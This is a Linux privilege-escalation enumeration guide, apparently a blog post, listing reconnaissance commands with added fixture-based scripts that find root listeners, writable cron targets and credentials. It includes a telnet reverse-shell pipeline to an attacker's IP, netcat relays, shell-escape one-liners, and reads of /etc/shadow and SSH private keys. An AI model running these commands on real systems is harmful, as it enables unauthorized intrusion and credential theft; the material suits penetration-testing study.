Before starting this article, I would like to point out that I am not an expert. As far as I know, there is no "magic" answer in this vast area. Share, share (this is my starting point). Here is a mix of commands that do the same thing in different places, or just a different way of looking at things. I know there is more "stuff" to look for. This is just a basic rough guide. Not every command will do a good job; pay attention to detail.
Any given command in this article may not be available on your shell, because some of them are specific to other Linux distributions or versions.
Key points of enumeration
The approach that works (on Linux):
Collect - Enumeration, more enumeration, and some more enumeration.
Process - Sort through the data, analyse it and prioritise.
Search - Know what to search for and where to find the exploit code.
Adapt - Customise the exploit so it fits. Not every exploit works on every system "out of the box".
Try - Get ready for (lots of) trial and error.
System type
What is the system version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
What is the kernel version?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz
What environment variables are set?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
Is there a printer?
lpstat -a
Applications and Services
What services are running? Which user is each service running as?
ps aux
ps -ef
top
cat /etc/services
Which services are running as root? Of those, look for ones with known vulnerabilities and check them again!
ps aux | grep root
ps -ef | grep root
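A root process is only a target if you can reach it, so the next question is which of those root processes are also listening on the network. The script below (an added example, not part of the original post) joins a process listing with `netstat -tulpn` output on the PID. Both inputs are constructed sample output embedded in the script; the live-host invocation is shown in the comment.

```shell
#!/bin/sh
# Added example, not from the original post: answer "which root processes are
# reachable over the network?" by joining process listings with listening
# sockets on PID. Both inputs here are constructed sample output; on a live host:
#   root_listeners "$(ps -eo pid=,user=,comm=)" "$(netstat -tulpn 2>/dev/null)"
# (netstat -p only shows the PID for processes you own unless you are root.)

SAMPLE_PS='    1 root     systemd
  612 root     sshd
  701 mysql    mysqld
  730 root     cupsd
  815 www-data apache2
  845 root     dhclient
  902 root     cron'

SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      612/sshd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      701/mysqld
tcp        0      0 0.0.0.0:631             0.0.0.0:*               LISTEN      730/cupsd
tcp6       0      0 :::80                   :::*                    LISTEN      815/apache2
udp        0      0 0.0.0.0:68              0.0.0.0:*                           845/dhclient'

# root_listeners PS_OUTPUT NETSTAT_OUTPUT
# Prints "pid program local_address" for each socket whose owning process runs
# as root. Root processes without a socket (cron) and unprivileged daemons
# (mysqld, apache2) are dropped. A root daemon bound to 127.0.0.1 is still
# reported: it matters to an attacker who is already local.
root_listeners() {
    {
        printf '%s\n' "$1" | awk '$2 == "root" { print "PS", $1 }'
        printf '%s\n' "$2" | awk '$1 ~ /^(tcp|udp)6?$/ { print "NET", $0 }'
    } | awk '
        $1 == "PS"  { rootpid[$2] = 1; next }
        $1 == "NET" {
            split($NF, p, "/")                          # "612/sshd" -> pid, program
            if (p[1] in rootpid) print p[1], p[2], $5   # $5 = Local Address
        }'
}

root_listeners "$SAMPLE_PS" "$SAMPLE_NETSTAT"
```

Run as-is it prints sshd, cupsd and dhclient (the three root-owned sockets in the sample); the unprivileged mysqld and apache2 listeners and the socket-less cron process are left out.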
What applications are installed? What versions are they? Which are currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/
Service settings: are there any misconfigurations? Are there any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'    # everything readable under /etc
What jobs are scheduled on the host?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
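Listing the cron jobs is only half of the check; the payoff is a root-owned job whose script (or the directory holding it) can be rewritten by an unprivileged user. The script below is an added example, not part of the original post: it parses crontab-style lines, takes the first word of each command and reports targets that are world-writable or sit in a world-writable, non-sticky directory. The crontab text and the files it points at are a constructed fixture under a temporary directory; the ROOT prefix exists only so the fixture can stand in for `/`.

```shell
#!/bin/sh
# Added example, not from the original post: check whether anything a cron job
# runs can be modified by an unprivileged user. A root crontab that runs a
# world-writable script (or a script in a world-writable, non-sticky directory)
# lets you swap in your own payload and wait for the next run.
#
# The crontab text and the files under $WORK are a constructed fixture; on a
# live host you would call:  cron_world_writable_targets /etc/crontab 1 ""

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

mkdir -p "$WORK/opt/backup" "$WORK/usr/local/bin" "$WORK/var/tmp/scripts"
chmod 0755 "$WORK/opt" "$WORK/opt/backup" "$WORK/usr" "$WORK/usr/local" \
           "$WORK/usr/local/bin" "$WORK/var" "$WORK/var/tmp"
chmod 0777 "$WORK/var/tmp/scripts"                 # world-writable, no sticky bit
printf '#!/bin/sh\ntar czf /srv/backup.tgz /srv\n' > "$WORK/opt/backup/run.sh"
printf '#!/bin/sh\nrm -f /var/tmp/*.old\n'          > "$WORK/usr/local/bin/cleanup"
printf '#!/bin/sh\nlogrotate /etc/logrotate.conf\n' > "$WORK/var/tmp/scripts/rotate.sh"
chmod 0777 "$WORK/opt/backup/run.sh"               # world-writable script
chmod 0755 "$WORK/usr/local/bin/cleanup"           # fine
chmod 0755 "$WORK/var/tmp/scripts/rotate.sh"       # fine itself, but its directory is not

cat > "$WORK/crontab" <<'EOF'
# constructed /etc/crontab (system format: minute hour dom month dow USER command)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /opt/backup/run.sh
@reboot         root    /usr/local/bin/cleanup
0 3     * * *   root    /var/tmp/scripts/rotate.sh
EOF

# mode_char PATH N: the Nth character of the ls -l mode string (9 = other
# write, 10 = other execute / sticky). Mode-based, so the answer is the same
# whether the audit runs as root or not (unlike test -w).
mode_char() { ls -ld "$1" | cut -c"$2"; }

# cron_targets CRONFILE SYS: print the first word of every command. SYS=1 for
# /etc/crontab and /etc/cron.d/* (they carry a user field), 0 for crontab -l.
cron_targets() {
    awk -v sys="$2" '
        /^[[:space:]]*(#|$)/ { next }              # comments and blank lines
        /^[A-Za-z_][A-Za-z0-9_]*=/ { next }        # SHELL=, PATH=, MAILTO=
        {
            skip = ($1 ~ /^@/) ? 1 : 5             # @reboot etc. vs five time fields
            print $(skip + sys + 1)
        }' "$1"
}

# cron_world_writable_targets CRONFILE SYS ROOT: report absolute-path targets
# that are world-writable ("file") or live in a world-writable directory
# without the sticky bit ("dir"). ROOT is prefixed to each path (for fixtures).
cron_world_writable_targets() {
    cron_targets "$1" "$2" | while IFS= read -r target; do
        case $target in /*) ;; *) continue ;; esac   # bare names need PATH resolution; skipped here
        full="$3$target"
        [ -e "$full" ] || continue
        dir=$(dirname "$full")
        if [ "$(mode_char "$full" 9)" = "w" ]; then
            printf '%s file\n' "$target"
        elif [ "$(mode_char "$dir" 9)" = "w" ]; then
            case $(mode_char "$dir" 10) in
                [tT]) ;;                              # sticky: only the owner can replace it
                *) printf '%s dir\n' "$target" ;;
            esac
        fi
    done
}

cron_world_writable_targets "$WORK/crontab" 1 "$WORK"
```

Against the fixture this reports `/opt/backup/run.sh file` and `/var/tmp/scripts/rotate.sh dir`; `cleanup` is clean and the `cd / && run-parts` entry is skipped because its first word is not an absolute path. Commands that start with a bare program name, or with `sh -c`, need the PATH (and the script they invoke) checked the same way.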
What plain-text usernames and passwords might be on the host?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"    # Joomla
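The one-off greps above are fine for a single file; across a web root you want one recursive sweep with a pattern tight enough to skip prose and binaries. The script below is an added example, not part of the original post. It constructs a small set of files (a Joomla-style configuration.php, a .env, a README and a binary blob) in a temporary directory and runs one `grep` over them; the pattern requires a credential-like key followed, within a few punctuation characters, by `=`, `:` or `=>`.

```shell
#!/bin/sh
# Added example, not from the original post: a single grep sweep for
# credential-looking assignments, with a constructed set of files to show what
# it catches and what it leaves alone. On a live host point it at /var/www,
# /etc, /opt or a user's home:  find_creds /var/www

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
mkdir -p "$WORK/www/cache"

cat > "$WORK/www/configuration.php" <<'EOF'
<?php
class JConfig {
    public $user = 'joomla';
    public $password = 'Sup3rS3cret!';
    public $db = 'joomladb';
}
EOF
cat > "$WORK/www/.env" <<'EOF'
DB_USERNAME=app
DB_PASSWORD=hunter2
API_KEY=0123456789abcdef
EOF
cat > "$WORK/www/README" <<'EOF'
Set the password in configuration.php before first use.
EOF
head -c 512 /dev/zero > "$WORK/www/cache/session.bin"   # binary file: -I skips it

# find_creds DIR: recursive (-r), case-insensitive (-i), skipping binaries (-I),
# with file:line: prefixes (-n). The key must be followed by at most three
# non-word characters (closing quote, space) and then = or : or =>, which
# keeps sentences such as "the password in ..." out of the results.
find_creds() {
    grep -rIinE '(passw(or)?d|secret|api[_-]?key|token)[^[:alnum:]_]{0,3}(=>|=|:)' "$1" 2>/dev/null
}

find_creds "$WORK/www"
```

On the fixture this returns three lines: the Joomla `$password`, `DB_PASSWORD` and `API_KEY`. The README sentence and the binary file produce nothing. Expect real web roots to also hit cache and vendor directories; add `--exclude-dir` for those rather than loosening the pattern.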
Communications and networking
What NIC(s) does the system have? Which network(s) is it connected to?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
What are the network configuration settings? What servers are on the network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
Which other users and hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
What's cached? IP and/or MAC addresses?
arp -e
route
/sbin/route -nee
Can packets be sniffed? What do you see? Monitor the traffic.
# tcpdump 'tcp and dst host [IP] and dst port [port]'
tcpdump 'tcp and ((dst host 192.168.1.7 and dst port 80) or (dst host 10.2.2.222 and dst port 21))'
How do you get a shell? How do you interact with the system?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444    # Attacker. Input (commands)
nc -lvp 4445    # Attacker. Output (results)
telnet [attacker's IP] 4444 | /bin/sh | telnet [attacker's IP] 4445    # On the target system. Use the attacker's IP!
How to port forward? (Port redirection)
# rinetd
# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch
# fpipe
# fpipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
fpipe.exe -l 80 -r 80 -s 80 192.168.1.7
# ssh
# ssh -[L/R] [local port]:[remote IP]:[remote port] [local user]@[local IP]
ssh -L 8080:127.0.0.1:80 [user]@[ip]    # Local port
ssh -R 8080:127.0.0.1:80 [user]@[ip]    # Remote port
# mknod
# mknod backpipe p; nc -l -p [remote port] < backpipe | nc [local IP] [local port] > backpipe
mknod backpipe p; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 > backpipe    # Port relay
mknod backpipe p; nc -l -p 8080 < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow > backpipe    # Proxy (port 8080), logging both directions to inflow/outflow
mknod backpipe p; nc -l -p 8080 < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow > backpipe &    # Proxy monitor (port 8080), same thing backgrounded
Is it possible to build tunnels? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig
Confidential information and users
Who are you? Who is logged in? Who has been logged in? Who else is here? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d: -f1    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }'    # List of super users (UID 0)
awk -F: '($3 == "0") { print }' /etc/passwd    # List of super users (UID 0)
cat /etc/sudoers
sudo -l
What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
Anything "interesting" in the home directories? If it's possible to access them
ls -ahlR /root/
ls -ahlR /home/
Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
What have the users been doing? Are there any passwords in there? Have they been editing anything?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
File system
Which configuration files in /etc/ can be written to? Able to reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null    # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null      # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null   # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null       # Other
find /etc/ -writable -type f 2>/dev/null               # Writable by the current user
find /etc/ -maxdepth 1 -writable -type f 2>/dev/null   # Same, top level of /etc only
What can be found in /var/?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
Any settings/files (hidden) on the website? Any settings files with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
What's in the log files? (Could help with "Local File Inclusion"?)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# Other common names: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp (what's in each file? logins, system boots ...)
# wtmp, utmp, btmp, lastlog and faillog are binary records; read them with last, who, lastb, lastlog and faillog rather than cat.
If the shell is limited, what can you do to break out of it?
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import os; os.system("/bin/bash")'
/bin/sh -i
How are the file systems mounted?
mount
df -h
Are there any unmounted file systems?
cat /etc/fstab
What "advanced Linux file permissions" are used? Sticky bits, SUID and SGID
find / -perm -1000 -type d 2>/dev/null   # Sticky bit - only the owner of the directory or of a file can delete or rename it there
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - runs as the group, not the user who started it
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - runs as the owner, not the user who started it
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null    # SGID or SUID (the parentheses matter: without them -type f applies only to the SUID half)
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in "common" places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (quicker search)
# Starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -maxdepth 3 \( -perm -2000 -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
Where can written to and executed from? A couple of "common" places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null       # folders writable by the current user (not necessarily world-writable)
find / -perm -222 -type d 2>/dev/null      # world-writable folders
find / -perm -o=w -type d 2>/dev/null      # world-writable folders
find / -perm -o=x -type d 2>/dev/null      # world-executable folders
find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null    # world-writable & executable folders
Any "problem" files? Writable, "nobody" files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print    # world-writable folders without the sticky bit
find /dir -xdev \( -nouser -o -nogroup \) -print    # files with no owner / no group
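The three permission checks above (SUID/SGID binaries, world-writable directories without the sticky bit, world-writable files under /etc) are the ones worth scripting, and they are easy to get subtly wrong: `-o` without parentheses, or `-writable` when you meant "writable by everyone". The script below is an added example, not part of the original post. It builds a small constructed directory tree with one hit of each kind and runs the checks against it, so the expected output is known; on a live host pass `/` instead of the fixture root.

```shell
#!/bin/sh
# Added example, not from the original post: the SUID/SGID, world-writable
# directory and writable-config checks from this section, run against a
# constructed directory tree so the expected hits are known. On a live host
# call each function with / as the root (adding -xdev keeps find out of /proc).

ROOT=$(mktemp -d)             # mktemp -d creates the top directory as 0700
trap 'rm -rf "$ROOT"' EXIT

mkdir -p "$ROOT/usr/bin" "$ROOT/etc" "$ROOT/tmp" "$ROOT/opt/app"
chmod 0755 "$ROOT/usr" "$ROOT/usr/bin" "$ROOT/etc" "$ROOT/opt"   # explicit, so umask does not matter
chmod 1777 "$ROOT/tmp"        # world-writable with sticky bit: normal
chmod 0777 "$ROOT/opt/app"    # world-writable without sticky bit: suspicious
: > "$ROOT/usr/bin/passwd";   chmod 4755 "$ROOT/usr/bin/passwd"   # SUID
: > "$ROOT/usr/bin/wall";     chmod 2755 "$ROOT/usr/bin/wall"     # SGID
: > "$ROOT/usr/bin/ls";       chmod 0755 "$ROOT/usr/bin/ls"       # neither
: > "$ROOT/etc/passwd";       chmod 0644 "$ROOT/etc/passwd"
: > "$ROOT/etc/app.conf";     chmod 0666 "$ROOT/etc/app.conf"     # anyone can rewrite this config

# find_setid_bins ROOT: regular files with SUID or SGID set. The parentheses
# around -o are required; without them -type f binds only to the last test.
find_setid_bins() {
    find "$1" \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null | sort
}

# find_world_writable_dirs_nosticky ROOT: directories anyone can write to where
# anyone can also delete or rename other users' files (no sticky bit).
# /tmp-style 1777 directories are excluded.
find_world_writable_dirs_nosticky() {
    find "$1" -type d -perm -0002 ! -perm -1000 2>/dev/null | sort
}

# find_world_writable_conf ROOT: files under etc/ writable by everyone. This is
# a mode-bit test (-perm), not -writable: -writable answers "can *I* write
# this?", which is true for every file when the check runs as root.
find_world_writable_conf() {
    find "$1/etc" -type f -perm -0002 2>/dev/null | sort
}

echo "SUID/SGID:";            find_setid_bins "$ROOT"
echo "world-writable dirs:";  find_world_writable_dirs_nosticky "$ROOT"
echo "world-writable conf:";  find_world_writable_conf "$ROOT"
```

On the fixture the three functions return exactly `usr/bin/passwd` and `usr/bin/wall`, `opt/app`, and `etc/app.conf` (each under the temporary root); `tmp` is not reported because of its sticky bit and `usr/bin/ls` because it has neither set-id bit.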
Preparation and finding exploit code
What development tools/languages are installed/supported?
find / -name 'perl*'
find / -name 'python*'
find / -name 'gcc*'
find / -name cc
How can files be uploaded?
find / -name wget
find / -name 'nc*'
find / -name 'netcat*'
find / -name 'tftp*'
find / -name ftp
Find exploit code
Http://www.exploit-db.com
Http://1337day.com
Http://www.securiteam.com
Http://www.securityfocus.com
Http://www.exploitsearch.net
http://metasploit.com/modules/
Http://securityreason.com
Http://seclists.org/fulldisclosure/
http://www.google.com
Find more information about the vulnerability
Http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]
http://www.91ri.org/
(Quick) "common" exploits, precompiled binaries
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/
Is the information above difficult to gather by hand?
Go ahead and use a third-party script/tool to try it out!
Is the system fully patched? Kernel, operating system, all applications, their plugins and web services
apt-get update && apt-get upgrade
yum update
What are the minimum permissions each service needs to run?
For example, does MySQL need to run as root?
Can you find a script that automates the above from one of the following sites?
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
Http://bastille-linux.sourceforge.net
(Quick) guides and links
For example
Http://www.0daysecurity.com/penetration-testing/enumeration.html
Http://www.microloft.co.uk/hacking/hacking3.htm
Other
Http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
Http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
Http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html